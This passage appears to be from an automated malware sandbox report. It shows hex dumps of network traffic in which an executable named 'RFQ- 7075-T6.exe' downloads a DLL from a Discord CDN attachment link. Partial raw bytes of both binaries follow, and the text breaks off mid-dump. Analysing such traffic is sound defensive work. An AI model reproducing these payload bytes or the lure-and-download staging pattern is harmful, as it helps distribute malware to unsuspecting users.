                  Data Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ab fc 08 ea ef 9d 66 b9 ef 9d 66 b9 ef 9d 66 b9 f4 00 cd b9 a9 9d 66 b9 f4 00 f8 b9 ec 9d 66 b9 f4 00 fb b9 ee 9d 66 b9 52 69 63 68 ef 9d 66 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 cb 17 11 4a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d2 02 00 00 00 00 00 00 00 00 00 60 f0 01 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 02 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 d0 02 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$ffffffRichfPELJ`@@.text `
                  Aug 8, 2022 22:21:09.415494919 CEST666INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Aug 8, 2022 22:21:09.415546894 CEST668INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Aug 8, 2022 22:21:09.415600061 CEST669INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Aug 8, 2022 22:21:09.415652037 CEST670INData Raw: 18 88 4d f8 8b d0 8b c8 c1 ea 10 c1 e9 08 83 c4 10 83 c7 10 83 c3 10 83 c6 10 ff 4d 18 88 55 f9 88 4d fa 88 45 fb 75 8a 8b 4d 10 2b cf 03 4d 14 8b f1 74 2f 8b 4d 0c 8d 55 dc 52 8b 55 08 8d 45 ec 50 51 52 e8 29 22 00 00 83 c4 10 33 c0 85 f6 74 11
                  Data Ascii: MMUMEuM+Mt/MURUEPQR)"3t+L2@;G;r^_[];SlUSVWMu$+3IN@;_G_^[]3Q_P_V_EUEjEPV]]]
                  Aug 8, 2022 22:21:09.415704966 CEST672INData Raw: 9a 9a 2f c7 85 d0 fb ff ff 09 07 07 0e c7 85 d4 fb ff ff 36 12 12 24 c7 85 d8 fb ff ff 9b 80 80 1b c7 85 dc fb ff ff 3d e2 e2 df c7 85 e0 fb ff ff 26 eb eb cd c7 85 e4 fb ff ff 69 27 27 4e c7 85 e8 fb ff ff cd b2 b2 7f c7 85 ec fb ff ff 9f 75 75
                  Data Ascii: /6$=&i''Nuut,,X.4-6nnZZ[RRM;;va} {))R$>(q//^,
                  Aug 8, 2022 22:21:09.415755033 CEST673INData Raw: ff 8e 7a 7a f4 c7 85 e8 fd ff ff e9 ae ae 47 c7 85 ec fd ff ff 18 08 08 10 c7 85 f0 fd ff ff d5 ba ba 6f c7 85 f4 fd ff ff 88 78 78 f0 c7 85 f8 fd ff ff 6f 25 25 4a c7 85 fc fd ff ff 72 2e 2e 5c c7 85 00 fe ff ff 24 1c 1c 38 c7 85 04 fe ff ff f1
                  Data Ascii: zzGoxxo%%Jr..\$8WsQ#|tt!> KK$a(,0pp4B>>|8q<ff@HHD
                  Aug 8, 2022 22:21:09.415807009 CEST674INData Raw: f7 ff ff a1 e2 69 4e c7 85 00 f8 ff ff cd f4 da 65 c7 85 04 f8 ff ff d5 be 05 06 c7 85 08 f8 ff ff 1f 62 34 d1 c7 85 0c f8 ff ff 8a fe a6 c4 c7 85 10 f8 ff ff 9d 53 2e 34 c7 85 14 f8 ff ff a0 55 f3 a2 c7 85 18 f8 ff ff 32 e1 8a 05 c7 85 1c f8 ff
                  Data Ascii: iNeb4S.4U2u 9$`@(q^,Qn0!>4=8><FM@TD]qHoLP`P$TXC@\
                  Aug 8, 2022 22:21:09.415855885 CEST676INData Raw: 85 14 fa ff ff a6 ca 82 fc c7 85 18 fa ff ff b0 d0 90 e0 c7 85 1c fa ff ff 15 d8 a7 33 c7 85 20 fa ff ff 4a 98 04 f1 c7 85 24 fa ff ff f7 da ec 41 c7 85 28 fa ff ff 0e 50 cd 7f c7 85 2c fa ff ff 2f f6 91 17 c7 85 30 fa ff ff 8d d6 4d 76 c7 85 34
                  Data Ascii: 3 J$A(P,/0Mv4MC8TM<@DjLH,LQeFP^T]5Xst\.A`ZgdRh3VlGmpat
                  Aug 8, 2022 22:21:09.415909052 CEST677INData Raw: ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 04 8b 71 08 8b fe c1 cf 08 81 e7 00 ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 08 8b 71 0c 8d 42 04 8b fe c1 cf 08 81 e7 00 ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 0c 8b 71 10 8b fe c1
                  Data Ascii: zqzqBzqzqzqzI}ru3]xL
                  Aug 8, 2022 22:21:09.444318056 CEST679INData Raw: 04 81 e6 ff 00 00 00 33 54 b0 04 8b f7 33 51 10 c1 fe 08 81 e6 ff 00 00 00 8b 74 b0 04 c1 ce 10 c1 cb 08 33 f3 8b 5d f0 81 e3 ff 00 00 00 8b 5c 98 04 c1 c3 08 33 f3 8b 5d fc c1 fb 18 81 e3 ff 00 00 00 33 74 98 04 8b 5d f0 33 71 14 89 7d f8 c1 ff
                  Data Ascii: 3T3Qt3]\3]3t]3q}|\3]\3]3|3y}}\}|3}|3}3\ 3YM]


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449739162.159.135.233443C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  TimestampkBytes transferredDirectionData
                  2022-08-08 20:21:09 UTC0OUTGET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1
                  Host: cdn.discordapp.com
                  Connection: Keep-Alive
                  2022-08-08 20:21:09 UTC0INHTTP/1.1 200 OK
                  Date: Mon, 08 Aug 2022 20:21:09 GMT
                  Content-Type: application/x-msdos-program
                  Content-Length: 59904
                  Connection: close
                  CF-Ray: 737af4ed0aeb9168-FRA
                  Accept-Ranges: bytes
                  Age: 126957
                  Cache-Control: public, max-age=31536000
                  Content-Disposition: attachment;%20filename=RealProxyFlagsBadSignature.dll, attachment
                  ETag: "79242a4038e35f2234d3373fb9133c3b"
                  Expires: Tue, 08 Aug 2023 20:21:09 GMT
                  Last-Modified: Sun, 07 Aug 2022 05:12:50 GMT
                  Vary: Accept-Encoding
                  CF-Cache-Status: HIT
                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                  x-goog-generation: 1659849170365462
                  x-goog-hash: crc32c=NYw5/Q==
                  x-goog-hash: md5=eSQqQDjjXyI00zc/uRM8Ow==
                  x-goog-metageneration: 1
                  x-goog-storage-class: STANDARD
                  x-goog-stored-content-encoding: identity
                  x-goog-stored-content-length: 59904
                  X-GUploader-UploadID: ADPycdtRyusN_8DC5mg2MaVL524NLkn5nNeiOIitS4yQBgVRJp9EkfaQwQZi1fehDhLKVcf0Zt4Nik1UNY7AFqv7RQqo
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lSrBqSdtmz7eJi5F%2FZQuOrYsTTnEOOZHaNgbOny3bTvOFEW1VpwFbRJu53FirNtFJPkm%2FpzIJxOQ2j0vN0cibGxmOHoTHAre3hhtkjY6Yt08xEPPT0tBPI21FMSgXB24x0%2FJDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  2022-08-08 20:21:09 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                  2022-08-08 20:21:09 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 48 ef 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b8 00 00 00 30 00 00 00 00 00 00 8e d6 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELHb!0 @ @`
                  2022-08-08 20:21:09 UTC2INData Raw: 38 a3 05 00 00 20 0b 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0b 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 1b 05 00 00 38 23 02 00 00 38 1e 02 00 00 20 0d 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0d 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 ea 05 00 00 38 f8 01 00 00 38 f3 01 00 00 20 15 00 00 00 fe 0c 00 00 3f fc 00 00 00 20 15 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 74 08 00 00 20 11 00 00 00 fe 0c 00 00 3f 64 00 00 00 20 11 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 19 07 00 00 20 0f 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 34 06 00 00 38 8b 01 00 00 20 10 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 93 06 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 00 00 3f 3e 00 00 00 20 13 00
                  Data Ascii: 8 ? =88#8 ? =888 ? =8t ?d =8 ? =848 ? =88e8` ?>
                  2022-08-08 20:21:09 UTC4INData Raw: 00 00 01 e0 fe 0c 0c 00 fe 0c 02 00 58 4a 54 fe 0c 0b 00 fe 0c 03 00 20 00 00 00 00 59 fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 9e fe 0c 03 00 20 01 00 00 00 58 fe 0e 03 00 fe 0c 0c 00 20 10 00 00 00 58 fe 0e 0c 00 38 56 f8 ff ff fe 0c 04 00 fe 0c 03 00 20 01 00 00 00 59 20 01 00 00 00 9c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 fe 0c 06 00 fe 0c 03 00 20 01 00 00 00 59 9a fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4a fe 0c 01 00 7e 03 00 00 04 fe 0c 0b 00 fe 0c 03 00 20 01 00 00 00 59 94 97 29 05 00 00 11 7e 03 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 06 00 00 11 55 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c3 f7 ff ff fe 0c 08 00 fe 0c 03 00 20 02 00 00 00 59 8f 05 00 00 01 e0 4c fe 0c 08 00 fe 0c 03 00
                  Data Ascii: XJT Y XXJ X X8V Y Y Y YJ~ Y)~XJ)U X8 YL
                  2022-08-08 20:21:09 UTC5INData Raw: 0a 2a 2a fe 09 00 00 28 06 00 00 0a 2a 2a fe 09 00 00 73 07 00 00 0a 2a 00 00 13 30 03 00 98 00 00 00 00 00 00 00 20 08 00 00 00 8d 0b 00 00 01 80 03 00 00 04 7e 03 00 00 04 20 00 00 00 00 fe 06 02 00 00 06 9b 7e 03 00 00 04 20 01 00 00 00 fe 06 03 00 00 06 9b 7e 03 00 00 04 20 02 00 00 00 fe 06 04 00 00 06 9b 7e 03 00 00 04 20 03 00 00 00 fe 06 05 00 00 06 9b 7e 03 00 00 04 20 04 00 00 00 fe 06 06 00 00 06 9b 7e 03 00 00 04 20 05 00 00 00 fe 06 07 00 00 06 9b 7e 03 00 00 04 20 06 00 00 00 fe 06 08 00 00 06 9b 7e 03 00 00 04 20 07 00 00 00 fe 06 09 00 00 06 9b 2a 26 02 28 08 00 00 0a 00 00 2a 2a 00 02 28 0c 00 00 0a 00 00 2a aa 73 0e 00 00 0a 80 04 00 00 04 73 0f 00 00 0a 80 05 00 00 04 73 10 00 00 0a 80 06 00 00 04 73 11 00 00 0a 80 07 00 00 04 00 2a 13
                  Data Ascii: **(**s*0 ~ ~ ~ ~ ~ ~ ~ ~ *&(**(*ssss*
                  2022-08-08 20:21:09 UTC6INData Raw: 00 2b 0a 2b 06 00 00 05 0a 2b 00 06 2a 13 30 02 00 98 01 00 00 1b 00 00 11 00 05 14 fe 01 16 fe 01 13 10 11 10 39 80 01 00 00 05 6f 36 00 00 0a 0b 38 64 01 00 00 07 6f 37 00 00 0a 0c 07 6f 38 00 00 0a 13 10 11 10 39 4a 01 00 00 07 6f 06 00 00 2b 0d 07 6f 3a 00 00 0a 6f 3b 00 00 0a 13 04 09 14 fe 01 16 fe 01 13 10 11 10 39 25 01 00 00 02 2c 03 03 2d 03 16 2b 01 17 00 13 11 11 11 2c 58 02 8e b7 17 da 13 05 16 11 05 13 0e 13 08 2b 3e 02 11 08 9a 13 07 03 11 08 9a 13 06 11 04 11 07 6f 3c 00 00 0a 13 11 11 11 2c 1b 09 11 06 28 3d 00 00 0a 13 10 11 10 2c 07 07 6f 3e 00 00 0a 00 00 14 0b 00 2b 12 00 00 11 08 17 d6 13 08 11 08 11 0e 13 12 11 12 31 b8 00 07 14 fe 01 16 fe 01 13 11 11 11 39 aa 00 00 00 04 14 fe 01 16 fe 01 13 10 11 10 2c 7f 04 6f 3f 00 00 0a 17 da
                  Data Ascii: +++*09o68do7o89Jo+o:o;9%,-+,X+>o<,(=,o>+19,o?
                  2022-08-08 20:21:09 UTC8INData Raw: 00 00 06 16 28 54 00 00 0a 6a 02 d6 0b 2b 17 00 00 09 17 d6 0d 09 11 07 13 09 11 09 3e 4d ff ff ff 16 6a 0b 2b 00 07 2a 1b 30 0b 00 ec 05 00 00 22 00 00 11 00 18 8d 08 00 00 01 13 2f 11 2f 16 72 d2 04 00 70 a2 00 11 2f 17 72 75 07 00 70 a2 00 11 2f 28 31 00 00 06 13 04 18 8d 08 00 00 01 13 2f 11 2f 16 72 1a 08 00 70 a2 00 11 2f 17 72 15 0a 00 70 a2 00 11 2f 28 31 00 00 06 13 14 18 8d 08 00 00 01 13 2f 11 2f 16 72 ba 0a 00 70 a2 00 11 2f 17 72 61 0d 00 70 a2 00 11 2f 28 31 00 00 06 13 08 18 8d 08 00 00 01 13 2f 11 2f 16 72 06 0e 00 70 a2 00 11 2f 17 72 53 11 00 70 a2 00 11 2f 28 31 00 00 06 13 0a 18 8d 08 00 00 01 13 2f 11 2f 16 72 f8 11 00 70 a2 00 11 2f 17 72 a3 14 00 70 a2 00 11 2f 28 31 00 00 06 13 0b 18 8d 08 00 00 01 13 2f 11 2f 16 72 48 15 00 70 a2
                  Data Ascii: (Tj+>Mj+*0"//rp/rup/(1//rp/rp/(1//rp/rap/(1//rp/rSp/(1//rp/rp/(1//rHp
                  2022-08-08 20:21:09 UTC9INData Raw: 20 13 24 00 11 1a 1f 2c 11 24 11 1f d6 9e 28 52 00 00 0a 1a fe 01 13 32 11 32 2c 22 11 12 12 01 7b 10 00 00 04 11 1a 6f 46 00 00 06 16 fe 01 13 31 11 31 2c 06 73 5e 00 00 0a 7a 00 2b 1f 11 15 12 01 7b 10 00 00 04 11 1a 6f 4a 00 00 06 16 fe 01 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 11 06 12 01 7b 10 00 00 04 6f 5e 00 00 06 15 fe 01 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 de 40 25 28 61 00 00 0a 13 2d 00 12 01 7b 11 00 00 04 84 28 62 00 00 0a 13 2e 11 2e 14 fe 01 16 fe 01 13 32 11 32 2c 08 11 2e 6f 63 00 00 0a 00 00 16 13 07 28 64 00 00 0a de 0d 28 64 00 00 0a de 00 00 17 13 07 2b 00 11 07 2a 41 1c 00 00 00 00 00 00 5e 02 00 00 45 03 00 00 a3 05 00 00 40 00 00 00 09 00 00 01 13 30 03 00 25 00 00 00 23 00 00 11 00 02 28 13 00 00 2b 0c 02 28 14 00 00 2b 0a 08
                  Data Ascii: $,$(R22,"{oF11,s^z+{oJ22,s^z{o^22,s^z@%(a-{(b..22,.oc(d(d+*A^E@0%#(+(+
                  2022-08-08 20:21:09 UTC10INData Raw: 00 00 00 00 14 01 00 00 00 08 08 00 00 00 01 2f 37 dc ae ae dc 37 2f 01 2f 37 dc cb cb dc 37 2f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 09 09 00 00 00 01 76 e1 14 e2 e2 14 e1 76 01 76 e1 14 8f 8f 14 e1 76 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0a 0a 00 00 00 01 23 e0 a6 83 83 a6 e0 23 01 23 e0 a6 e1 e1 a6 e0 23 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0b 0b 00 00 00 01 44 f4 63 61 61 63 f4 44 01 44 f4 63 0d 0d 63 f4 44 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0c 0c 00 00 00 01 3b 76 fc f1 f1 fc 76 3b 01 3b 76 fc 88 88 fc 76 3b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0d 0d 00 00 00 01
                  Data Ascii: /77//77/vvvv####DcaacDDccD;vv;;vv;
                  2022-08-08 20:21:09 UTC12INData Raw: 0d 89 88 88 89 0d 12 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 25 25 00 00 00 01 40 00 72 29 29 72 00 40 01 40 00 72 4c 4c 72 00 40 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 26 26 00 00 00 01 72 76 bb 70 70 bb 76 72 01 72 76 bb 02 02 bb 76 72 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 27 27 00 00 00 01 55 ac 1d 45 45 1d ac 55 01 55 ac 1d 36 36 1d ac 55 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 28 28 00 00 00 01 71 fa 59 45 45 59 fa 71 01 71 fa 59 2c 2c 59 fa 71 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 29 29 00 00 00 01 08 5f 25 11 11 25 5f 08 01 08 5f 25 7e 7e 25 5f 08 06 15 11 00 00 00 05 05
                  Data Ascii: %%@r))r@@rLLr@&&rvppvrrvvr''UEEUU66U((qYEEYqqY,,Yq))_%%__%~~%_
                  2022-08-08 20:21:09 UTC13INData Raw: 00 00 14 01 00 00 00 41 41 00 00 00 01 28 e9 7e 32 32 7e e9 28 01 28 e9 7e 12 12 7e e9 28 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 42 42 00 00 00 01 0b ea 50 bd bd 50 ea 0b 01 0b ea 50 d9 d9 50 ea 0b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 43 43 00 00 00 01 53 1f 2d f2 f2 2d 1f 53 01 53 1f 2d 93 93 2d 1f 53 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 44 44 00 00 00 01 20 bf 80 05 05 80 bf 20 01 20 bf 80 7c 7c 80 bf 20 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 45 45 00 00 00 01 02 83 a0 91 91 a0 83 02 01 02 83 a0 e2 e2 a0 83 02 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 46 46 00 00 00 01 00 23
                  Data Ascii: AA(~22~((~~(BBPPPPCCS--SS--SDD || EEFF#
                  2022-08-08 20:21:09 UTC14INData Raw: 03 03 71 a7 70 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 5e 5e 00 00 00 01 49 5c 51 39 39 51 5c 49 01 49 5c 51 4d 4d 51 5c 49 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 5f 5f 00 00 00 01 5b a6 9c 50 50 9c a6 5b 01 5b a6 9c 70 70 9c a6 5b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 60 60 00 00 00 01 05 6b 97 c3 c3 97 6b 05 01 05 6b 97 ab ab 97 6b 05 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 61 61 00 00 00 01 1f 01 62 87 87 62 01 1f 01 1f 01 62 f3 f3 62 01 1f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 62 62 00 00 00 01 1b d6 66 06 06 66 d6 1b 01 1b d6 66 72 72 66 d6 1b 06 15 11 00 00 00 05 05 00 00
                  Data Ascii: qp^^I\Q99Q\II\QMMQ\I__[PP[[pp[``kkkkaabbbbbbfffrrf
                  2022-08-08 20:21:09 UTC16INData Raw: 14 01 00 00 00 7a 7a 00 00 00 01 4f 25 6a 23 23 6a 25 4f 01 4f 25 6a 46 46 6a 25 4f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7b 7b 00 00 00 01 17 c9 8a e0 e0 8a c9 17 01 17 c9 8a 92 92 8a c9 17 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7c 7c 00 00 00 01 46 24 a0 0d 0d a0 24 46 01 46 24 a0 23 23 a0 24 46 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7d 7d 00 00 00 01 14 42 91 60 60 91 42 14 01 14 42 91 08 08 91 42 14 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7e 7e 00 00 00 01 0f 29 86 71 71 86 29 0f 01 0f 29 86 05 05 86 29 0f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7f 7f 00 00 00 01 36 ce c7 32
                  Data Ascii: zzO%j##j%OO%jFFj%O{{||F$$FF$##$F}}B``BBB~~)qq)))62
                  2022-08-08 20:21:09 UTC17INData Raw: 31 dc 49 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 13 13 00 00 00 01 11 b8 2a 8d 8d 2a b8 11 01 11 b8 2a ff ff 2a b8 11 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 14 14 00 00 00 01 77 3a 83 96 96 83 3a 77 01 77 3a 83 f9 f9 83 3a 77 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 15 15 00 00 00 01 07 0d b1 74 74 b1 0d 07 01 07 0d b1 00 00 b1 0d 07 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 16 16 00 00 00 01 7b 43 ce 6d 6d ce 43 7b 01 7b 43 ce 08 08 ce 43 7b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 17 17 00 00 00 01 1d aa 8e cc cc 8e aa 1d 01 1d aa 8e af af 8e aa 1d 06 15 11 00 00 00 05 05 00 00 00 01
                  Data Ascii: 1I****w::ww::wtt{CmmC{{CC{
                  2022-08-08 20:21:09 UTC18INData Raw: 00 00 00 2f 2f 00 00 00 01 4b 02 15 a1 a1 15 02 4b 01 4b 02 15 e0 e0 15 02 4b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 30 30 00 00 00 01 64 67 a3 c8 c8 a3 67 64 01 64 67 a3 ba ba a3 67 64 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 31 31 00 00 00 01 32 4f 28 aa aa 28 4f 32 01 32 4f 28 c7 c7 28 4f 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 32 32 00 00 00 01 13 6d 96 e4 e4 96 6d 13 01 13 6d 96 a0 a0 96 6d 13 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 33 33 00 00 00 01 3c ab de ba ba de ab 3c 01 3c ab de d5 d5 de ab 3c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 